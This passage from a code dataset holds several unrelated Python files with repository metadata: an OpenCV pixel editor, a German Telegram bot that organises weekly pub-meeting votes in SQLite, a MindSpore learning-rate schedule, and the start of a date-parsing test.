f.read()) c.execute('INSERT INTO sqlsmith_errors VALUES (?)', (text,)) con.commit()
23.851852
85
0.701863
164cb532a76617daac24630c5cbab3d72c4bf693
2,203
py
Python
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
2
2017-11-30T21:12:11.000Z
2017-12-01T07:52:43.000Z
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
14
2017-11-14T18:12:53.000Z
2018-06-03T16:07:57.000Z
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
3
2018-02-05T10:40:03.000Z
2018-02-09T09:29:19.000Z
import cv2 import numpy as np from robolib.images.feature_extraction import resize_image_to_info __DEFAULT_CONTINUE_KEYS = [27, 13, 32] def get_pixel_input_raw(rows, cols, name="Edit Image", dtype=np.float32, low=-1, high=1, continue_keys=None): return np.array(_get_pixel_input_raw(rows, cols, name, dtype, low, high, continue_keys)[:, :]) def _get_pixel_input_raw(rows, cols, name="Edit Image", dtype=np.float32, low=-1, high=1, continue_keys=None): """Get a small image drawn by the user.""" if continue_keys is None: continue_keys = __DEFAULT_CONTINUE_KEYS def draw_circle(event, x, y, flags, param): if 0 <= x < img.shape[1] and 0 <= y < img.shape[0]: if event in [cv2.EVENT_MOUSEMOVE, cv2.EVENT_LBUTTONDOWN] and flags & cv2.EVENT_FLAG_LBUTTON: img[y, x] = low if flags & cv2.EVENT_FLAG_SHIFTKEY else high img = np.empty((rows, cols, 1), dtype) img.fill(low) cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO) cv2.setMouseCallback(name, draw_circle) while True: cv2.imshow(name, img) if wait_for_end_key(continue_keys): break cv2.destroyAllWindows() return img def get_drawing_input(dst_rows, dst_cols, inp_rows=None, inp_cols=None, name="Input Drawing", dtype=np.float32, low=-1, high=1, continue_keys=None): if inp_rows is None: inp_rows = dst_rows * 2 if inp_cols is None: inp_cols = dst_cols * 2 img = _get_pixel_input_raw(inp_rows, inp_cols, name, dtype, low, high, continue_keys) img = resize_image_to_info(img, dst_rows, dst_cols, low, high) return np.array(img[:, :]).reshape((9, 9, 1)) def show_image(mat, name="Image", end_key=27, continue_keys=None): if continue_keys is None: continue_keys = __DEFAULT_CONTINUE_KEYS cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO) cv2.imshow(name, mat) ret = False while True: k = wait_for_end_key(continue_keys) if k: if k == end_key: ret = True break cv2.destroyAllWindows() return ret def wait_for_end_key(continue_keys): k = cv2.waitKey(20) & 0xFF return k if k in continue_keys else 0
30.597222
148
0.669995
d5c1194ffec6d10f95aba586977b20adfc1cbf7c
26,507
py
Python
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2021-08-11T18:50:04.000Z
2021-08-11T18:50:04.000Z
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2019-05-16T06:28:36.000Z
2019-05-16T06:28:36.000Z
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2019-05-14T14:02:58.000Z
2019-05-14T14:02:58.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- ## Stammtischbot # # Macht Mittwochs eine Umfrage um herauszufinden wohin es zum Stammtisch gehen soll import sys import json import sqlite3 from telegram.ext import Updater from telegram.ext import CommandHandler from telegram.ext import MessageHandler, Filters import datetime, time import os import logging from threading import Thread import sys os.environ['TZ'] = 'Europe/Berlin' TIME_ZONE_MOD=+2 TOKEN = sys.argv[1] DEFAULT_STAMMTISCHTAG = 3 MAX_LOCATIONS = 30 TAGE = {1 : "Montag", 2 : "Dienstag", 3 : "Mittwoch", 4 : "Donnerstag", 5 : "Freitag", 6 : "Samstag", 7 : "Sonntag"} logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() def add_column_if_not_exists(c, table_name, new_column, new_column_type): tab_exists=False for row in c.execute('SELECT name FROM sqlite_master WHERE type= ? AND name = ?', ['table', table_name]): tab_exists=True if tab_exists: columns = [i[1] for i in c.execute('PRAGMA table_info(' + str(table_name) + ')')] if new_column not in columns: c.execute('ALTER TABLE ' + str(table_name) + ' ADD COLUMN ' + str(new_column) + ' ' + str(new_column_type)) # Create table c.execute('''CREATE TABLE IF NOT EXISTS chatrooms (chat_id INTEGER, stammtischtag INTEGER, last_notified INTEGER, last_voting_notification INTEGER, last_organizer INTEGER )''') # Add last_organizer for existing databases add_column_if_not_exists(c, 'chatrooms', 'last_organizer', 'INTEGER') c.execute('''CREATE TABLE IF NOT EXISTS "locations" ( "chat_id" INTEGER, "l_id" INTEGER, "location" TEXT UNIQUE, PRIMARY KEY("chat_id","l_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "votings" ( "chat_id" INTEGER, "member_id" INTEGER, "member_name" TEXT, "location_id" INTEGER, PRIMARY KEY("chat_id","member_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "voiced" ( "chat_id" INTEGER, "member_id" INTEGER, PRIMARY KEY("chat_id","member_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "member_credits" ( "chat_id" INTEGER, "member_id" INTEGER, "credits" INTEGER, PRIMARY KEY("chat_id","member_id") )''') ###### ## Liste mit den Locations fuer den Stammtisch ###### def load_locations(): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() locations = {} print('Lade Locations...') print('-----------------------------------') for row in c.execute('SELECT chat_id, l_id, location FROM locations'): if row[0] not in locations: print ('Chat ID: %s' % (str(row[0]))) print('-----------------------------------') locations[row[0]] = [] locations[row[0]].append((row[1], row[2])) print(u'Location hinzugefuegt: ID: %d, %d' % (row[0], row[1]) ) conn.close() return locations # Lade Locations wenn die Datei fuer locations existiert locations = load_locations() # Wenn keine Location existiert, erzeuge eine leere Liste if locations == None: locations = {} ###### ## Liste mit den Chats die der Bot angehoert ###### def load_chatrooms(): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() chatrooms = {} for row in c.execute('SELECT chat_id, stammtischtag, last_notified, last_voting_notification, last_organizer FROM chatrooms'): chatrooms[row[0]] = [row[1],row[2], row[3], row[4]] conn.close() return chatrooms # Lade chatrooms wenn die Datei fuer chatrooms existiert chatrooms = load_chatrooms() # Wenn keine Location existiert, erzeuge eine leere Liste if chatrooms == None: chatrooms = {} conn.commit() conn.close() ###### ## Methoden fuer den Chatbot ###### # Fuehrt ein Query aus, liefert keine Daten zurueck def execute_query(query, args): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() c.execute(query, args) conn.commit() conn.close() # Fuert ein Query aus, liefert das Resultat als 2D-Array zurueck def execute_select(query, args): conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() result = [] for row in c.execute(query, args): result.append(row) conn.close() return result # Fuegt einen neuen Gruppenchat hinzu, in dem der Bot hinzugefuegt wurde def add_chatroom(chat_id): if chat_id not in chatrooms: chatrooms[chat_id] = [DEFAULT_STAMMTISCHTAG, 0, 0] print('New chatroom: ' + str(chat_id)) execute_query('INSERT INTO chatrooms (chat_id, stammtischtag, last_notified, last_voting_notification) VALUES (?, ?, 0, 0)', [chat_id, chatrooms[chat_id][0]]) # Entfernt alle Daten ueber einen Gruppenchat, asu dem der Bot entfernt wurde def remove_chatroom(chat_id): if chat_id in chatrooms: print('Removed from Chat: ' + str(chat_id)) chatrooms.pop(chat_id, None) locations.pop(chat_id, None) execute_query('DELETE FROM chatrooms WHERE chat_id = ?', [chat_id]) execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id]) execute_query('DELETE FROM locations WHERE chat_id = ?', [chat_id]) print('Removed from chatroom: %s' % chat_id) def start(update, context): add_chatroom(update.message.chat.id) context.bot.send_message(chat_id=update.message.chat_id, text="I'm a bot, please talk to me!") # Prueft ob der User der Nachricht der Admin oder der Ersteller ist. # Bei beiden liefert er True zurueck def has_admin(update, context): chat_id = update.message.chat.id user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id) is_admin = 'administrator' == user.status is_creator = 'creator' == user.status return is_admin or is_creator # Prueft ob der aufrufende Benutzer von einem Admin voice erhalten hat # Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen def has_voice(update, context): chat_id = update.message.chat.id user_id = update.message.from_user.id is_voiced = execute_select('SELECT 1 FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) return len(is_voiced) > 0 # Erteilt einem Benutzer Voice. Darf nur von Admins ausgefuehrt werden. def voice(update, context): chat_id = update.message.chat.id is_admin = has_admin(update, context) if not is_admin: update.message.reply_text(u'Nur Admins können diese Funktion benutzen') return for mention in update.message.entities: if mention.user is not None: user_id = mention.user.id user_name = mention.user.first_name execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) execute_query('INSERT INTO voiced (chat_id, member_id) VALUES (?, ?)', [chat_id, user_id]) update.message.reply_text(u'%s wurde authorisiert' % (user_name)) # Entzieht einem User voice. Darf nur von einem Admin gemacht werden def revoke(update, context): chat_id = update.message.chat.id is_admin = has_admin(update, context) if not is_admin: update.message.reply_text(u'Nur Admins können diese Funktion benutzen') return for mention in update.message.entities: if mention.user is not None: user_id = mention.user.id user_name = mention.user.first_name execute_query('DELETE FROM voiced WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) update.message.reply_text(u'%s kann die erweiterten Funktionen nicht mehr nutzen' % (user_name)) # Fuegt einen ort zu den Stammtischen hinzu. Darf nut von Usern mit voice oder Admins gemacht werden def add_location(update, context): global locations add_chatroom(update.message.chat.id) chat_id = update.message.chat.id location = ' '.join(context.args).strip() is_admin = has_admin(update, context) is_voiced = has_voice(update, context) if not is_admin and not is_voiced: update.message.reply_text(u'Du hast keine Berechtigung einen Ort hinzuzufügen, frage einen Admin ob er dich dazu berechtigt.') return if chat_id not in locations: locations[chat_id] = [] if location and location not in locations[chat_id] and len(locations) <= MAX_LOCATIONS: execute_query('''INSERT INTO locations (chat_id, l_id, location) VALUES (?, Ifnull((SELECT max(l_id)+1 FROM locations WHERE chat_id = ?), 1), ?)''', (chat_id, chat_id, location)) locations = load_locations() update.message.reply_text('Das Ziel ' + location + u' wurde hinzugefügt') elif len(locations) > MAX_LOCATIONS: update.message.reply_text('Ihr habt das Limit von %s Locations erreicht, sorry!') # Listet alle Orte, die für den Stammtisch verfügbar sind, auf. def list_locations(update, context): message = u'Folgende Stammtischziele stehen zur Verfügung:\r\n' if update.message.chat.id in locations: i = 1 for loc in locations[update.message.chat.id]: message = message + str(loc[0]) + '. ' + loc[1] + '\r\n' i += 1 context.bot.send_message(chat_id=update.message.chat_id, text=message) else: context.bot.send_message(chat_id=update.message.chat_id, text=u'Es gibt noch keine Stammtischziele, füge welche mit /add hinzu') # Loescht einen Ort. Darf nut von Admins gemacht werden def del_location(update, context): global locations add_chatroom(update.message.chat.id) chat_id = update.message.chat.id location_id = int(' '.join(context.args).strip()) is_admin = has_admin(update, context) if not is_admin: update.message.reply_text(u'Du hast keine Berechtigung einen Ort zu löschen, frage einen Admin ob den Ort für dich löscht.') return if chat_id not in locations: locations[chat_id] = [] loc_exist = False loc_name = '' for loc in locations[chat_id]: if loc[0] == location_id: loc_exist = True loc_name = loc[1] break if location_id and loc_exist: execute_query('''DELETE FROM locations WHERE chat_id = ? AND l_id = ?''', (chat_id, location_id)) locations = load_locations() update.message.reply_text('Das Ziel ' + str(location_id) + '. ' + loc_name + u' wurde gelöscht') else: update.message.reply_text('Die Location existiert nicht (mehr)!') # Setzt den Tag des Stammtisches. Davon hängt ab wann abgestimmt wird. Duerfen nur Admins machen. def set_stammtischtag(update, context): chat_id = update.message.chat.id from_user = context.bot.get_chat_member(update.message.chat.id, update.message.from_user.id) is_admin = has_admin(update, context) if not is_admin: update.message.reply_text(u'Du bist kein Admin, sorry!') return for arg in context.args: try: tag = int(arg) if chat_id in chatrooms and tag >= 1 and tag <= 7: chatrooms[chat_id] = tag execute_query('UPDATE chatrooms SET stammtischtag = ? WHERE chat_id = ?', [tag, chat_id]) update.message.reply_text(u'Der Stammtischtag wurde auf %s gesetzt' % TAGE[tag]) elif tag < 1 or tag > 7: update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son') except ValueError: update.message.reply_text(u'Erlaubte Werte sind 1 bis 7 für Mon bis Son') # Event handler wenn der Bot einem Gruppenchat hinzugefuegt wird def new_member(update, context): for member in update.message.new_chat_members: print(member) if member.username == 'DummerStammtischBot': add_chatroom(update.message.chat.id) context.bot.send_message(chat_id=update.message.chat_id, text=u'Hallo zusammen, ich bin eurem Chat beigetreten\r\nFolgende Befehl stehen euch zur Auswahl:\r\n /stammtischtag oder /st: Legt den Tag des Stammtischs fest\r\n /add: Ein Stammtischziel hinzufügen\r\n /list: Alle Stammtischziele anzeigen') else: update.message.reply_text(u'Hallo ' + member.username + ', willkommen am Stammtisch!') # Event handler wenn der Bot einem Gruppenchat entfernt wird def left_member(update, context): member = update.message.left_chat_member print(member) if member.username == 'DummerStammtischBot': remove_chatroom(update.message.chat.id) # Zeigt alle verfuegbaren Funktionen an def help(update, context): context.bot.send_message(chat_id=update.message.chat_id, text=u'''Ich bin der StammtischBot!\r\n Folgende Befhele stehen euch zur Auswahl: [Admins] /stammtischtag oder /st: Legt den Tag des Stammtischs fest /voice [1..x]: Der angegebene Benutzer kann die erweiterte Funktionen nutzen /revoke [1..x]: Entzieht den angegebenen Benutzern die Rechte auf die erweiterten funktionen. [Erweiterte Funktionen] /add: Ein Stammtischziel hinzufügen /del: Löscht einen Ort [Alle] /list: Alle Stammtischziele anzeigen /help: Diese Nachricht anzeigen /not_today: Der aktuelle Organisator kann die Orge eine Stunde nach der Entscheidung abgeben''') # Gibt aus, ob der Chat im Abstimmzeitraum befindet def is_voting_time(chat_id, message_date): # Weekday of Message weekday = message_date.weekday()+1 # Hour of message hour = message_date.hour+TIME_ZONE_MOD # Am Tag vor dem Stammtisch soll abgestimmt werden dayToNotifyAt = chatrooms[chat_id][0]-1 # Zeitpunkt an dem das letztre Voting gestartet wurde lastNotified = chatrooms[chat_id][1] # Zeitpunkt an dem das letztre Voting beendet wurde lastVotingNotified = chatrooms[chat_id][2] # Wir wollen am Vortag zwischen 8 und 18 Uhr voten print('--------------------------------------------------') print('Check is voting time') print('--------------------------------------------------') print('Weekday: %d' % (weekday)) print('Hour: %d' % (hour)) print('Day to notify: %d' % (dayToNotifyAt)) print('Last voting: %d' % (lastNotified)) print('Last voting ended: %d' % (lastVotingNotified)) print('Notify today: %s' % (str(dayToNotifyAt == weekday and hour >= 8 and hour < 18))) print('--------------------------------------------------') return dayToNotifyAt == weekday and hour >= 8 and hour < 18 # Informiert den Chat ueber diverse Dinge def notifier(context): for chat_id in chatrooms: now = int(time.time()) weekday = datetime.datetime.today().weekday()+1 hour = datetime.datetime.now().hour print('Hour: %s' % (hour)) # Am Tag vor dem Stammtisch soll abgestimmt werden dayToNotifyAt = chatrooms[chat_id][0]-1 # Zeitpunkt an dem das letztre Voting gestartet wurde lastNotified = chatrooms[chat_id][1] # Zeitpunkt an dem das letztre Voting beendet wurde lastVotingNotified = chatrooms[chat_id][2] # Wir wollen am Vortag installieren nur einmal pro Woche nach 8 Uhr if dayToNotifyAt == weekday and lastNotified+518400 < now and hour >= 8: print("Notifying %s" % chat_id) execute_query('DELETE FROM votings WHERE chat_id = ?', [chat_id]) message = u'Hallo, morgen ist wieder Stammtisch. Bitte voted bis heute um 18 Uhr, für ein Ziel.\nWenn man voted muss man kommen, sonst gibts Haue!\n\n' if chat_id in locations: message += u'Folgende Stammtischziele stehen zur Verfügung:\r\n' for loc in locations[chat_id]: message += '%s. %s\r\n' % (loc[0],loc[1]) message += u'\nStimme mit 1 bis %s ab' % len(locations[chat_id]) else: message += u'Leider gibt es noch keine Ziele. Füge welche mit /add <Name> hinzu' context.bot.send_message(chat_id=chat_id, text=message) execute_query('UPDATE chatrooms SET last_notified = ? WHERE chat_id = ?', [now, chat_id]) chatrooms[chat_id][1] = now if dayToNotifyAt == weekday and lastVotingNotified+518400 < now and hour >= 18: last_organizer = chatrooms[chat_id][3] conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\n\n' i = 1 for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]): message += '%s. %s (%s Stimmen)\n' % (i, row[0], row[1]) i += 1 organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone() message += '\n%s darf diese Woche den Stammtisch organisieren' % organisierer[0] org_member_id = organisierer[1] context.bot.send_message(chat_id=chat_id, text=message) execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id]) # If User was never organizer, they get 4 credits credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, member_id]) if len(credits) == 0: execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4]) # Add a credit to the member execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id]) chatrooms[chat_id][2] = now chatrooms[chat_id][3] = org_member_id # Abstimmfunktion, der benutzer muss nur eine valide Zahl in den Chat eintippen, damit er abstimmt. # Er wird vom Bot informiert, wenn er abgestimmt hat. def vote(update, context): print('------------------------------------') print ('Voting...') print('------------------------------------') chat_id = update.message.chat.id user_id = update.message.from_user.id user_name = update.message.from_user.first_name message_date = update.message.date print(u'%s hat mit %s abgestimmt' % (user_name, update.message.text)) print('Is voting time: %s' % (str(is_voting_time(chat_id, message_date)))) if chat_id in chatrooms and is_voting_time(chat_id, message_date): print ('Chatgroup is included') try: auswahl = int(update.message.text.strip()) valid_selection = False for l in locations[chat_id]: if auswahl == l[0]: valid_selection = True if auswahl >= 1 and valid_selection: print('Auswahl ist vorhanden') execute_query('DELETE FROM votings WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) execute_query('INSERT INTO votings (chat_id, member_id, member_name, location_id) VALUES (?, ?, ?, ?)', [chat_id, user_id, user_name, auswahl]) location = execute_select('SELECT location FROM locations WHERE chat_id = ? AND l_id = ?', [chat_id, auswahl])[0] print('Location ist %s' % (location[0])) update.message.reply_text(u'%s hat für %s gestimmt' % (update.message.from_user.first_name, location[0])) except ValueError: a = 0 print('------------------------------------') # Prueft ob der aufrufende Benutzer genug credits zum aufrufen der ot_today funktion hat # Falls ja, kann dieser User die erweiterten Funktionen des Bots nutzen def has_enought_member_credits(update, context): chat_id = update.message.chat.id user_id = update.message.from_user.id credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) # If User was never organizer, they get 4 credits if len(credits) == 0: execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4]) credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) credits = credits.fetchone()[0] enougth_credits = False if credits >= 3: enougth_credits = True execute_query('UPDATE member_credits SET credits = credits-3 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id]) return enougth_credits # Gibt aus, ob der /nottoday Befehl vom Organisator durchgeführt werden kann def is_nottoday_time(chat_id, message_date): # Weekday of Message weekday = message_date.weekday()+1 # Hour of message hour = message_date.hour # Am Tag vor dem Stammtisch soll abgestimmt werden dayToNotifyAt = chatrooms[chat_id][0]-1 # Zeitpunkt an dem das letztre Voting gestartet wurde lastNotified = chatrooms[chat_id][1] # Zeitpunkt an dem das letztre Voting beendet wurde lastVotingNotified = chatrooms[chat_id][2] # Wir wollen am Vortag zwischen 8 und 18 Uhr voten return dayToNotifyAt == weekday and hour >= 18 and hour <= 19 # Funktion wenn der Organisator heute NICHT organisieren will def not_today(update, context): chat_id = update.message.chat.id user_id = update.message.from_user.id user_name = update.message.from_user.first_name message_date = update.message.date if chat_id in chatrooms and is_nottoday_time(chat_id, message_date) and user_id == chatrooms[chat_id][3]: if has_enought_member_credits(update, context): update.message.reply_text(u'%s möchte heute nicht den Stammtisch organisieren, es wird ein neuer Organisator gewählt.' % (update.message.from_user.first_name) ) last_organizer = chatrooms[chat_id][3] conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() message = 'Die Abstimmungszeit ist vorbei! Ihr habt wie folgt abgestimmt:\n\n' i = 1 for row in c.execute('select (SELECT location FROm locations l WHERE l.l_id = v.location_id AND l.chat_id = v.chat_id) location, count(*) c FROM votings v WHERE chat_id = ? GROUP BY location_id ORDER BY c DESC', [chat_id]): message += '%s. %s (%s Stimmen)\n' % (i, row[0], row[1]) i += 1 organisierer = c.execute('SELECT member_name, member_id FROM votings v WHERE chat_id = ? AND member_id IN (SELECT member_id FROM votings v2 WHERE chat_id = ? AND member_id IS NOT ? ORDER BY RANDOM() LIMIT 1)' , [chat_id, chat_id, last_organizer]).fetchone() message += '\n%s darf diese Woche den Stammtisch organisieren' % org[0] org_member_id = org[1] context.bot.send_message(chat_id=chat_id, text=message) execute_query('UPDATE chatrooms SET last_voting_notification = ?, last_organizer = ? WHERE chat_id = ?', [now, org_member_id, chat_id]) # If User was never organizer, they get 4 credits credits = execute_select('SELECT credits FROM member_credits WHERE chat_id = ? AND member_id = ?', [chat_id, user_id]) if len(credits) == 0: execute_query('INSERT INTO member_credits(chat_id, member_id, credits) VALUES (?, ?, ?)', [chat_id, member_id, 4]) # Add a credit to the member execute_query('UPDATE member_credits SET credits = credits+1 WHERE chat_id = ? AND member_id = ?', [chat_id, member_id]) chatrooms[chat_id][2] = now chatrooms[chat_id][3] = org_member_id else: update.message.reply_text(u'Du hast leider nicht genug Credits um die Organisation abzugeben!') elif chat_id in chatrooms and is_nottoday_time(chat_id, message_date): update.message.reply_text(u'Der Zeitraum die Organisation abzugeben ist leider schon vorbei!') elif chat_id in chatrooms and user_id != chatrooms[chat_id][3]: update.message.reply_text(u'Du Organisierst den Stammtisch heute gar nicht!') else: update.message.reply_text(u'Etwas ist schiefgegangen?!?!!?') ###### ## Bot Stuff. Init, Mappen der handler/methoden ###### updater = Updater(token=TOKEN, use_context=True) dispatcher = updater.dispatcher jobqueue = updater.job_queue start_handler = CommandHandler('start', start) dispatcher.add_handler(start_handler) # Job jede Minute job_minute = jobqueue.run_repeating(notifier, interval=600, first=20) # Fuegt eine Location zu den moeglichen Stammtischzielen hinzu add_handler = CommandHandler('add', add_location) dispatcher.add_handler(add_handler) # Loescht eine Location del_handler = CommandHandler('del', del_location) dispatcher.add_handler(del_handler) # Listet alle Stammtischzielen list_handler = CommandHandler('list', list_locations) dispatcher.add_handler(list_handler) # Benutzer mehr Berechtigung geben voice_handler = CommandHandler('voice', voice) dispatcher.add_handler(voice_handler) # Benutzer mehr Berechtigung geben revoke_handler = CommandHandler('revoke', revoke) dispatcher.add_handler(revoke_handler) # Organisator gibt orga ab not_today_handler = CommandHandler('not_today', not_today) dispatcher.add_handler(not_today_handler) # Setzt den Stammtischtag stammtischtag_handler = CommandHandler('stammtischtag', set_stammtischtag) st_handler = CommandHandler('st', set_stammtischtag) dispatcher.add_handler(stammtischtag_handler) dispatcher.add_handler(st_handler) # Hilfetext anzeigen help_handler = CommandHandler('help', help) dispatcher.add_handler(help_handler) # Eventhandler, wenn der Bot einem Chat hinzugefuegt wird dispatcher.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member)) # Eventhandler, wenn der Bot aus einem Chat entfernt wird dispatcher.add_handler(MessageHandler(Filters.status_update.left_chat_member, left_member)) # Echo handler vote_handler = MessageHandler(Filters.group, vote) dispatcher.add_handler(vote_handler) updater.start_polling() # Allen chats sagen, dass der Bot Online ist #for chatid in chatrooms: # updater.bot.send_message(chat_id=int(chatid), text='Ich bin Online!') updater.idle()
44.326087
312
0.674086
e66b64c090062fa4320308b0f75296dcc8e8c5a4
2,436
py
Python
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/retinaface_resnet50/src/lr_schedule.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """learning rate schedule.""" import math from .config import cfg_res50 def _linear_warmup_learning_rate(current_step, warmup_steps, base_lr, init_lr): lr_inc = (float(base_lr) - float(init_lr)) / float(warmup_steps) learning_rate = float(init_lr) + lr_inc * current_step return learning_rate def _a_cosine_learning_rate(current_step, base_lr, warmup_steps, decay_steps): base = float(current_step - warmup_steps) / float(decay_steps) learning_rate = (1 + math.cos(base * math.pi)) / 2 * base_lr return learning_rate def _dynamic_lr(base_lr, total_steps, warmup_steps, warmup_ratio=1 / 3): lr = [] for i in range(total_steps): if i < warmup_steps: lr.append(_linear_warmup_learning_rate(i, warmup_steps, base_lr, base_lr * warmup_ratio)) else: lr.append(_a_cosine_learning_rate(i, base_lr, warmup_steps, total_steps)) return lr def adjust_learning_rate(initial_lr, gamma, stepvalues, steps_pre_epoch, total_epochs, warmup_epoch=5): if cfg_res50['lr_type'] == 'dynamic_lr': return _dynamic_lr(initial_lr, total_epochs * steps_pre_epoch, warmup_epoch * steps_pre_epoch, warmup_ratio=1 / 3) lr_each_step = [] for epoch in range(1, total_epochs + 1): for _ in range(steps_pre_epoch): if epoch <= warmup_epoch: lr = 0.1 * initial_lr * (1.5849 ** (epoch - 1)) else: if stepvalues[0] <= epoch <= stepvalues[1]: lr = initial_lr * (gamma ** (1)) elif epoch > stepvalues[1]: lr = initial_lr * (gamma ** (2)) else: lr = initial_lr lr_each_step.append(lr) return lr_each_step
39.290323
103
0.64491
fc36197e9b5f7a39f94875fa5f46ff8640aed7c6
5,903
py
Python
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
from DateStringToISOFormat import parse_datestring_to_iso import demistomock as demisto import pytest # date_value, day_first, year_first, fuzzy, expected_output testdata = [ ('05-11-2929', True, True, True, True, '2929-11-05T00:00:00+00:00'), ('05-11-2929', True, False, True, True, '2929-11-05T00:00:00+00:00'), ('05-11-2929', True, True, False, True, '2929-11-05T00:00:00+00:00'), ('05-11-2929', True, False, False, False, '2929-11-05T00:00:00'), ('05-11-2929', False, True, True, False, '2929-05-11T00:00:00'), ('05-11-2929', False, False, True, False, '2929-05-11T00:00:00'), ('05-11-2929', False, False, False, False, '2929-05-11T00:00:00'), ('2020-06-11T17:34:35.754203+03:00', True, True, True, True, '2020-11-06T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', True, False, True, True, '2020-11-06T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', True, True, False, True, '2020-11-06T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', True, False, False, True, '2020-11-06T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', False, True, True, False, '2020-06-11T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', False, False, True, False, '2020-06-11T17:34:35.754203+03:00'), ('2020-06-11T17:34:35.754203+03:00', False, False, False, False, '2020-06-11T17:34:35.754203+03:00'), ("June 21st 2020 Eastern Standard Time", True, True, True, True, "2020-06-21T00:00:00+00:00"), ("June 21st 2020 Eastern Standard Time", True, False, True, True, "2020-06-21T00:00:00+00:00"), ("June 21st 2020 Eastern Standard Time", True, True, False, True, "June 21st 2020 Eastern Standard Time"), ("June 21st 2020 Eastern Standard Time", True, False, False, True, "June 21st 2020 Eastern Standard Time"), ("June 21st 2020 Eastern Standard Time", False, True, True, False, 